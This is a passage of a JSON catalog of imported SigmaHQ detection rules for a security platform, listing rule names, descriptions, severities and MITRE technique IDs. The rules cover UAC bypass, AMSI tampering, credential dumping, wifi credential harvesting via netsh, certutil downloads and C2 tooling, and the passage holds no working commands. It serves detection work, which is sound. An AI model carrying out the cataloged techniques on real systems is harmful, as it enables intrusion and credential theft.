This could be an indicator of sdclt being used in UAC bypass techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-uac-bypass-via-sdclt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40f9af16-589d-4984-b78d-8c2aec023197", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml" } }, { "id": "sigmahq-sigma-41025fd7-0466-4650-a813-574aaacbe7f4", "type": "detection", "name": "Malicious PowerShell Scripts - PoshModule", "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-scripts-poshmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41025fd7-0466-4650-a813-574aaacbe7f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml" } }, { "id": 
"sigmahq-sigma-410d2a41-1e6d-452f-85e5-abdd8257a823", "type": "detection", "name": "Azure Application Deleted", "description": "Identifies when a application is deleted in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-application-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "410d2a41-1e6d-452f-85e5-abdd8257a823", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_application_deleted.yml" } }, { "id": "sigmahq-sigma-411742ad-89b0-49cb-a7b0-3971b5c1e0a4", "type": "detection", "name": "Locked Workstation", "description": "Detects locked workstation session events that occur automatically after a standard period of inactivity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/locked-workstation.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_workstation_was_locked.yml" } }, { "id": "sigmahq-sigma-412d55bc-7737-4d25-9542-5b396867ce55", "type": "detection", "name": "JNDIExploit Pattern", "description": 
"Detects exploitation attempt using the JNDI-Exploit-Kit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jndiexploit-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "412d55bc-7737-4d25-9542-5b396867ce55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_jndi_exploit.yml" } }, { "id": "sigmahq-sigma-413d4a81-6c98-4479-9863-014785fd579c", "type": "detection", "name": "Okta Admin Role Assigned to an User or Group", "description": "Detects when an the Administrator role is assigned to an user or group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-admin-role-assigned-to-an-user-or-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "413d4a81-6c98-4479-9863-014785fd579c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_admin_role_assigned_to_user_or_group.yml" } }, { "id": "sigmahq-sigma-41421f44-58f9-455d-838a-c398859841d4", "type": "detection", "name": "ETW Logging Tamper In .NET 
Processes Via CommandLine", "description": "Detects changes to environment variables related to ETW logging via the CommandLine.\nThis could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-tamper-in-net-processes-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41421f44-58f9-455d-838a-c398859841d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml" } }, { "id": "sigmahq-sigma-41504465-5e3a-4a5b-a5b4-2a0baadd4463", "type": "detection", "name": "PsExec Tool Execution From Suspicious Locations - PipeName", "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-tool-execution-from-suspicious-locations-pipename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml" } }, { "id": "sigmahq-sigma-4153a907-2451-4e4f-a578-c52bb6881432", "type": "detection", "name": "Suspicious DNS Query with B64 Encoded String", "description": "Detects suspicious DNS queries using base64 encoding", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003", "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-query-with-b64-encoded-string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4153a907-2451-4e4f-a578-c52bb6881432", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_susp_b64_queries.yml" } }, { "id": 
"sigmahq-sigma-416bc4a2-7217-4519-8dc7-c3271817f1d5", "type": "detection", "name": "Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location", "description": "Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories.\nThese DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-loading-of-dbgcore-dbghelp-dlls-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "416bc4a2-7217-4519-8dc7-c3271817f1d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load.yml" } }, { "id": "sigmahq-sigma-418a3163-3247-4b7b-9933-dcfcb7c52ea9", "type": "detection", "name": "Compressed File Creation Via Tar.EXE", "description": "Detects execution of \"tar.exe\" in order to create a compressed file.\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1560", "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/compressed-file-creation-via-tar-exe.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "418a3163-3247-4b7b-9933-dcfcb7c52ea9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tar_compression.yml" } }, { "id": "sigmahq-sigma-418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "type": "detection", "name": "Potential Mpclient.DLL Sideloading", "description": "Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mpclient-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_windows_defender.yml" } }, { "id": "sigmahq-sigma-41bb431f-56d8-4691-bb56-ed34e390906f", "type": "detection", "name": "UAC Bypass Using MSConfig Token Modification - File", "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-msconfig-token-modification-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41bb431f-56d8-4691-bb56-ed34e390906f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" } }, { "id": "sigmahq-sigma-41ca393d-538c-408a-ac27-cf1e038be80c", "type": "detection", "name": "Directory Removal Via Rmdir", "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/directory-removal-via-rmdir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41ca393d-538c-408a-ac27-cf1e038be80c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml" } }, { 
"id": "sigmahq-sigma-41d1058a-aea7-4952-9293-29eaaf516465", "type": "detection", "name": "Removal Of AMSI Provider Registry Keys", "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/removal-of-amsi-provider-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41d1058a-aea7-4952-9293-29eaaf516465", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" } }, { "id": "sigmahq-sigma-41e5c73d-9983-4b69-bd03-e13b67e9623c", "type": "detection", "name": "Equation Group Indicators", "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/equation-group-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41e5c73d-9983-4b69-bd03-e13b67e9623c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" } }, { "id": "sigmahq-sigma-41f407b5-3096-44ea-a74f-96d04fbc41be", "type": "detection", "name": "Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate", "description": "Detects the execution of an AnyDesk binary with a version prior to 8.0.8.\nPrior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.\nUse this rule to detect instances of older versions of Anydesk using the compromised certificate\nThis is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-execution-with-known-revoked-signing-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41f407b5-3096-44ea-a74f-96d04fbc41be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml" } }, { "id": "sigmahq-sigma-41f6531d-af6e-4c6e-918f-b946f2b85a36", "type": "detection", "name": "Potential Persistence Via LSA Extensions", "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by 
lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-lsa-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml" } }, { "id": "sigmahq-sigma-42127bdd-9133-474f-a6f1-97b6c08a4339", "type": "detection", "name": "New Federated Domain Added - Exchange", "description": "Detects the addition of a new Federated Domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-federated-domain-added-exchange.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42127bdd-9133-474f-a6f1-97b6c08a4339", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml" } }, { "id": "sigmahq-sigma-42205c73-75c8-4a63-9db1-e3782e06fda0", "type": "detection", 
"name": "Suspicious Application Allowed Through Exploit Guard", "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-application-allowed-through-exploit-guard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" } }, { "id": "sigmahq-sigma-42333b2c-b425-441c-b70e-99404a17170f", "type": "detection", "name": "HackTool - Sliver C2 Implant Activity Pattern", "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sliver-c2-implant-activity-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42333b2c-b425-441c-b70e-99404a17170f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml" } }, { "id": "sigmahq-sigma-424273ea-7cf8-43a6-b712-375f925e481f", "type": "detection", "name": "Scheduled Task Executed From A Suspicious Location", "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusual program to be run from a Scheduled Task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scheduled-task-executed-from-a-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "424273ea-7cf8-43a6-b712-375f925e481f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml" } }, { "id": "sigmahq-sigma-4281cb20-2994-4580-aa63-c8b86d019934", "type": "detection", "name": "Hiding Files with Attrib.exe", "description": "Detects usage of attrib.exe to hide files from users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hiding-files-with-attrib-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "4281cb20-2994-4580-aa63-c8b86d019934", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml" } }, { "id": "sigmahq-sigma-42821614-9264-4761-acfc-5772c3286f76", "type": "detection", "name": "Root Certificate Installed - PowerShell", "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/root-certificate-installed-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42821614-9264-4761-acfc-5772c3286f76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" } }, { "id": "sigmahq-sigma-42a5f1e7-9603-4f6d-97ae-3f37d130d794", "type": "detection", "name": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-downloaded-from-file-sharing-website-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-42a993dd-bb3e-48c8-b372-4d6684c4106c", "type": "detection", "name": "HackTool - CrackMapExec Execution", "description": "This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1053", "T1059.003", "T1059.001", "T1110", "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-crackmapexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml" } }, { "id": "sigmahq-sigma-42b1a5b8-353f-4f10-b256-39de4467faff", "type": "detection", "name": "Harvesting Of Wifi Credentials Via Netsh.EXE", "description": "Detects the harvesting of wifi credentials using netsh.exe", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/harvesting-of-wifi-credentials-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42b1a5b8-353f-4f10-b256-39de4467faff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" } }, { "id": "sigmahq-sigma-42c575ea-e41e-41f1-b248-8093c3e82a28", "type": "detection", "name": "PsExec Service Installation", "description": "Detects PsExec service installation and execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42c575ea-e41e-41f1-b248-8093c3e82a28", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml" } }, { "id": "sigmahq-sigma-42ccce6d-7bd3-4930-95cd-e4d83fa94a30", "type": "detection", "name": "Bitbucket Project Secret Scanning Allowlist Added", 
"description": "Detects when a secret scanning allowlist rule is added for projects.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-project-secret-scanning-allowlist-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42ccce6d-7bd3-4930-95cd-e4d83fa94a30", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml" } }, { "id": "sigmahq-sigma-42d36aa1-3240-4db0-8257-e0118dcdd9cd", "type": "detection", "name": "Suspicious Hyper-V Cmdlets", "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-hyper-v-cmdlets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" } }, { "id": 
